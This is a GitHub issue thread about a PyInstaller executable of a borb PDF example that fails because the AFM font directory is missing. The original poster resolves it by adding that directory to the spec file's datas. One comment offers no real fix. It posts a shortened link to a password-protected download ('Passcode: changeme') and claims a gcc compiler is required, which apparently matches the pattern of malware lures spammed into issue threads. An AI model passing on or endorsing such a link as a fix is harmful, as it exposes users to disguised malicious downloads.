### ISSUE TITLE
Pyinstaller borb

### ISSUE THREAD

**Issue by Chasikanaft** [jorisschellekens/borb-examples#43]
Hi, I tried to compile the example script into an .exe file using pyinstaller. exe file was compiled but when launched it gives an error:

**Example:**
```
from borb.pdf import Document
from borb.pdf import PDF
from borb.pdf import Page
from borb.pdf import PageLayout
from borb.pdf import Paragraph
from borb.pdf import SingleColumnLayout


def main():
    # create Document
    doc: Document = Document()

    # create Page
    page: Page = Page()

    # add Page to Document
    doc.add_page(page)

    # set a PageLayout
    layout: PageLayout = SingleColumnLayout(page)

    # add a Paragraph
    layout.add(Paragraph("Hello World!"))

    # store
    with open("output.pdf", "wb") as pdf_file_handle:
        PDF.dumps(pdf_file_handle, doc)


if __name__ == "__main__":
    main()
```
**Error when launch exe file:**
`Traceback (most recent call last):
  File "borb_test.py", line 1, in <module>
  File "<frozen importlib._bootstrap>", line 1027, in _find_and_load
  File "<frozen importlib._bootstrap>", line 1006, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 688, in _load_unlocked
  File "PyInstaller\loader\pyimod02_importers.py", line 378, in exec_module
  File "borb\pdf\__init__.py", line 62, in <module>
  File "<frozen importlib._bootstrap>", line 1027, in _find_and_load
  File "<frozen importlib._bootstrap>", line 1006, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 688, in _load_unlocked
  File "PyInstaller\loader\pyimod02_importers.py", line 378, in exec_module
  File "borb\pdf\canvas\layout\annotation\free_text_annotation.py", line 26, in <module>
  File "borb\pdf\canvas\layout\annotation\free_text_annotation.py", line 44, in FreeTextAnnotation
  File "borb\pdf\canvas\font\simple_font\font_type_1.py", line 439, in __init__
AssertionError: AFM directory not found`

**exe file pyinstaller script:**
```
import PyInstaller.__main__

PyInstaller.__main__.run([
    '*examplefilename*.py',
    '--onefile',
    '--windowed',
])
```

**Comment by tinsn** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by Chasikanaft** [comment]
Being treated - add to spec file from this post https://github.com/jorisschellekens/borb/issues/196

```
datas = [
    (
        'venv\\Lib\\site-packages\\borb\\pdf\\canvas\\font\\simple_font\\afm',
        'borb\\pdf\\canvas\\font\\simple_font\\afm'
    ),
]
```
